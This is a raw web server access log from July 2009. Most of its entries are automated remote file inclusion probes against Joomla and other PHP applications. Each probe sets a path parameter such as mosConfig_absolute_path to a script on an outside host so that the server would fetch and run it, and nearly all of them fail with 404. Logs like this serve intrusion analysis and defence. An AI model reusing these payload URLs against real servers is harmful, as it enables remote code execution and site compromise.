211.206.120.187 - - [13/Jul/2009:04:16:30 -0400] "GET /logs/access_log.Q109061200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
76.12.17.218 - - [13/Jul/2009:04:17:15 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://perfumechaletusa.com/images/baner.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
76.12.17.218 - - [13/Jul/2009:04:17:15 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://perfumechaletusa.com/images/baner.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
76.12.17.218 - - [13/Jul/2009:04:17:15 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://perfumechaletusa.com/images/baner.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Jul/2009:04:17:17 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
76.12.17.218 - - [13/Jul/2009:04:17:24 -0400] "GET /logs/access_log.Q109051100%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://perfumechaletusa.com/images/baner.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:18:14 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://jst.or.th/index1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:18:14 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://jst.or.th/index1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:18:14 -0400] "GET /logs/access_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://jst.or.th/index1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
66.249.68.70 - - [13/Jul/2009:04:18:14 -0400] "GET /images/items/0011153_thumb.jpg HTTP/1.1" 200 2216 "-" "Googlebot-Image/1.0"
211.236.242.164 - - [13/Jul/2009:04:18:16 -0400] "GET /logs/error_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://jst.or.th/index1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
66.249.68.247 - - [13/Jul/2009:04:18:26 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0184CE4608B4C2003A81031+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.247 - - [13/Jul/2009:04:18:36 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L312838421A84C800D09106D+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.70 - - [13/Jul/2009:04:18:46 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L312838421AF49800D69106D+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.247 - - [13/Jul/2009:04:18:56 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L312838421AD42800D29106D+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
76.12.17.218 - - [13/Jul/2009:04:19:06 -0400] "GET /logs/access_log.Q109051600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://perfumechaletusa.com/images/baner.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
206.176.241.116 - - [13/Jul/2009:04:19:06 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://www.leeminhothailand.com/board/admin.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
206.176.241.116 - - [13/Jul/2009:04:19:06 -0400] "GET //galeria.php?start=0&kategoria=http://www.leeminhothailand.com/board/admin.txt??? HTTP/1.1" 404 210 "-" "libwww-perl/5.65"
206.176.241.116 - - [13/Jul/2009:04:19:06 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.leeminhothailand.com/board/admin.txt??? HTTP/1.1" 404 215 "-" "libwww-perl/5.65"
76.12.17.218 - - [13/Jul/2009:04:19:10 -0400] "GET /logs/access_log.Q109051100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://perfumechaletusa.com/images/baner.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:19:14 -0400] "GET /errors.php?error=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:19:14 -0400] "GET /logs/errors.php?error=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:19:14 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:19:24 -0400] "GET /errors.php?error=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:19:24 -0400] "GET /logs/errors.php?error=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:19:24 -0400] "GET /logs/access_log.Q109051700%20%20/errors.php?error=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.176.241.116 - - [13/Jul/2009:04:19:36 -0400] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://www.leeminhothailand.com/board/admin.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
79.174.68.88 - - [13/Jul/2009:04:20:14 -0400] "GET /logs/access_log.Q109061300/errors.php?error=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:20:20 -0400] "GET /logs/access_log.Q109061300%20%20/errors.php?error=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
201.232.54.48 - - [13/Jul/2009:04:20:28 -0400] "GET /logs/access_log.Q109050800%20%20/e404.php?DOCUMENT_ROOT=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:20:50 -0400] "GET /logs/errors.php?error=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:20:50 -0400] "GET /errors.php?error=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:20:50 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.232.54.48 - - [13/Jul/2009:04:21:01 -0400] "GET /logs/access_log.Q109051300%20%20/e404.php?DOCUMENT_ROOT=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
206.176.241.116 - - [13/Jul/2009:04:21:12 -0400] "GET //galeria.php?start=0&kategoria=http://www.leeminhothailand.com/board/admin.txt??? HTTP/1.1" 404 210 "-" "libwww-perl/5.65"
59.22.140.17 - - [13/Jul/2009:04:21:12 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:04:21:12 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:04:21:12 -0400] "GET /logs/access_log.Q109052700/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:21:15 -0400] "GET /logs/access_log.Q109061300/errors.php?error=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:04:21:17 -0400] "GET /logs/access_log.Q109051800/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:21:47 -0400] "GET /errors.php?error=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:21:47 -0400] "GET /logs/errors.php?error=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:21:47 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:04:22:05 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:04:22:05 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
124.0.145.1 - - [13/Jul/2009:04:22:05 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Jul/2009:04:22:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.88.194.18 - - [13/Jul/2009:04:22:24 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Embedded Web Browser from: http://bsalsa.com/; CIBA)"
122.88.194.18 - - [13/Jul/2009:04:22:24 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Embedded Web Browser from: http://bsalsa.com/; CIBA)"
122.88.194.18 - - [13/Jul/2009:04:22:26 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Embedded Web Browser from: http://bsalsa.com/; CIBA)"
122.88.194.18 - - [13/Jul/2009:04:22:27 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; Embedded Web Browser from: http://bsalsa.com/; CIBA)"
79.174.68.88 - - [13/Jul/2009:04:22:36 -0400] "GET /logs/access_log.Q109061300/errors.php?error=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:23:12 -0400] "GET /logs/access_log.Q109051600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:23:12 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:23:14 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:23:33 -0400] "GET /logs/error_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://jst.or.th/index1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:23:54 -0400] "GET /logs/access_log.Q109051100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
83.170.112.243 - - [13/Jul/2009:04:24:11 -0400] "GET /logs/access_log.Q109052900/phphtml.php?htmlclass_path=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
83.170.112.243 - - [13/Jul/2009:04:24:11 -0400] "GET /phphtml.php?htmlclass_path=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
83.170.112.243 - - [13/Jul/2009:04:24:12 -0400] "GET /logs/phphtml.php?htmlclass_path=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
211.236.242.164 - - [13/Jul/2009:04:24:14 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://jst.or.th/index1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:24:44 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:24:44 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:24:44 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:26:05 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:26:06 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:26:06 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
59.22.140.17 - - [13/Jul/2009:04:26:12 -0400] "GET /logs/access_log.Q109052700%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
66.249.68.247 - - [13/Jul/2009:04:26:12 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L312838421AA42800D79106D+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
59.22.140.17 - - [13/Jul/2009:04:26:22 -0400] "GET /logs/access_log.Q109051800%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:26:54 -0400] "GET /logs/access_log.Q109051600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:27:13 -0400] "GET /logs/access_log.Q109051100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Jul/2009:04:27:17 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
79.174.68.88 - - [13/Jul/2009:04:27:31 -0400] "GET /logs/access_log.Q109051700%20%20/errors.php?error=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.170.112.243 - - [13/Jul/2009:04:27:38 -0400] "GET /logs/access_log.Q109052400/phphtml.php?htmlclass_path=http://intranet.esc-clermont.fr///components/com_login/idste.txt? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
200.105.207.244 - - [13/Jul/2009:04:28:06 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://knbang.co.kr/security/trans/images/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:28:06 -0400] "GET /logs/errors.php?error=http://jst.or.th/index1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:28:06 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://jst.or.th/index1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [13/Jul/2009:04:28:06 -0400] "GET /errors.php?error=http://jst.or.th/index1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
79.174.68.88 - - [13/Jul/2009:04:28:09 -0400] "GET /logs/access_log.Q109061300%20%20/errors.php?error=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.105.207.244 - - [13/Jul/2009:04:28:10 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://knbang.co.kr/security/trans/images/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
200.105.207.244 - - [13/Jul/2009:04:28:10 -0400] "GET /logs/access_log.Q109051100%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://knbang.co.kr/security/trans/images/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:29:07 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
211.236.242.164 - - [13/Jul/2009:04:29:30 -0400] "GET /logs/access_log.Q109051100%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
211.206.120.187 - - [13/Jul/2009:04:29:31 -0400] "GET /logs/access_log.Q109061200%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
211.206.120.187 - - [13/Jul/2009:04:29:40 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.losnovel.com/firmas/skins/Standard_Swedish/emoticons/copyright?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
81.13.86.34 - - [13/Jul/2009:04:31:06 -0400] "GET //bbs/skin/ggambo7002_board/write.php?dir=http://www.tv-rb.ru/downloads/id.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
81.13.86.34 - - [13/Jul/2009:04:31:06 -0400] "GET /logs//bbs/skin/ggambo7002_board/write.php?dir=http://www.tv-rb.ru/downloads/id.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.803"
81.13.86.34 - - [13/Jul/2009:04:31:06 -0400] "GET /logs/access_log.Q109070800//bbs/skin/ggambo7002_board/write.php?dir=http://www.tv-rb.ru/downloads/id.txt??? HTTP/1.1" 404 261 "-" "libwww-perl/5.803"
123.143.98.5 - - [13/Jul/2009:04:32:00 -0400] "GET /logs/access_log.Q109070800//bbs/skin/ggambo7002_board/write.php?dir=http://www.tv-rb.ru/downloads/id.txt???? HTTP/1.1" 404 261 "-" "libwww-perl/5.805"
123.143.98.5 - - [13/Jul/2009:04:32:00 -0400] "GET /logs//bbs/skin/ggambo7002_board/write.php?dir=http://www.tv-rb.ru/downloads/id.txt???? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
123.143.98.5 - - [13/Jul/2009:04:32:01 -0400] "GET //bbs/skin/ggambo7002_board/write.php?dir=http://www.tv-rb.ru/downloads/id.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
209.59.12.99 - - [13/Jul/2009:04:32:17 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.247 - - [13/Jul/2009:04:34:02 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L312838421A245800DF9106D+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
79.174.68.88 - - [13/Jul/2009:04:34:14 -0400] "GET /logs/access_log.Q109051600/errors.php?error=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
141.223.5.12 - - [13/Jul/2009:04:37:14 -0400] "GET /index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.hair.gr/v8id.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
209.59.12.99 - - [13/Jul/2009:04:37:19 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.229.45.106 - - [13/Jul/2009:04:37:24 -0400] "GET /logs/access_log.Q109063000//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://digitalflutterby.com/read/idv6.txt?%0D?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
87.229.45.106 - - [13/Jul/2009:04:37:24 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://digitalflutterby.com/read/idv6.txt?%0D?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
87.229.45.106 - - [13/Jul/2009:04:37:24 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://digitalflutterby.com/read/idv6.txt?%0D?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
216.117.128.143 - - [13/Jul/2009:04:37:41 -0400] "GET /www.rosebanditz.com? HTTP/1.1" 404 217 "-" "libwww-perl/5.79"
87.229.45.106 - - [13/Jul/2009:04:38:17 -0400] "GET /logs/access_log.Q109060100//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://digitalflutterby.com/read/idv6.txt?%0D?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
216.117.128.143 - - [13/Jul/2009:04:38:43 -0400] "GET /logs/access_log.Q109052900/www.rosebanditz.com? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
216.117.128.143 - - [13/Jul/2009:04:38:43 -0400] "GET /www.rosebanditz.com? HTTP/1.1" 404 217 "-" "libwww-perl/5.79"
216.117.128.143 - - [13/Jul/2009:04:38:44 -0400] "GET /logs/www.rosebanditz.com? HTTP/1.1" 404 222 "-" "libwww-perl/5.79"
216.117.128.143 - - [13/Jul/2009:04:38:44 -0400] "GET /logs/access_log.Q109061000/www.rosebanditz.com? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
141.223.5.12 - - [13/Jul/2009:04:39:05 -0400] "GET /logs/access_log.Q109070500/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.hair.gr/v8id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
141.223.5.12 - - [13/Jul/2009:04:39:05 -0400] "GET /index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.hair.gr/v8id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
69.65.41.165 - - [13/Jul/2009:04:39:24 -0400] "GET /www.rosebanditz.com? HTTP/1.1" 404 217 "-" "libwww-perl/5.812"
69.65.41.165 - - [13/Jul/2009:04:39:45 -0400] "GET /logs/access_log.Q109052900/www.rosebanditz.com? HTTP/1.1" 404 244 "-" "libwww-perl/5.812"
69.65.41.165 - - [13/Jul/2009:04:39:46 -0400] "GET /www.rosebanditz.com? HTTP/1.1" 404 217 "-" "libwww-perl/5.812"
69.65.41.165 - - [13/Jul/2009:04:39:46 -0400] "GET /logs/www.rosebanditz.com? HTTP/1.1" 404 222 "-" "libwww-perl/5.812"
69.65.41.165 - - [13/Jul/2009:04:39:47 -0400] "GET /logs/access_log.Q109061000/www.rosebanditz.com? HTTP/1.1" 404 244 "-" "libwww-perl/5.812"
59.24.49.35 - - [13/Jul/2009:04:40:06 -0400] "GET /logs/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
59.24.49.35 - - [13/Jul/2009:04:40:06 -0400] "GET /index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
59.24.49.35 - - [13/Jul/2009:04:40:07 -0400] "GET /logs/access_log.Q109061100%20%20/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
59.24.49.35 - - [13/Jul/2009:04:40:10 -0400] "GET /logs/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
59.24.49.35 - - [13/Jul/2009:04:40:11 -0400] "GET /logs/access_log.Q109061100%20%20/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
59.24.49.35 - - [13/Jul/2009:04:40:11 -0400] "GET /index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
59.24.49.35 - - [13/Jul/2009:04:40:51 -0400] "GET /logs/access_log.Q109070500/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
59.24.49.35 - - [13/Jul/2009:04:40:57 -0400] "GET /logs/access_log.Q109070500/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
59.24.49.35 - - [13/Jul/2009:04:41:01 -0400] "GET /logs/access_log.Q109061100/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
59.24.49.35 - - [13/Jul/2009:04:41:08 -0400] "GET /logs/access_log.Q109061100/index.php?option=com_joomlaxplorer&task=rss&Itemid=&mosConfig_absolute_path=http://www.votemydog.com/dogs/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.249.68.70 - - [13/Jul/2009:04:41:59 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L312838421A542800D09106D+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
79.174.68.88 - - [13/Jul/2009:04:42:11 -0400] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
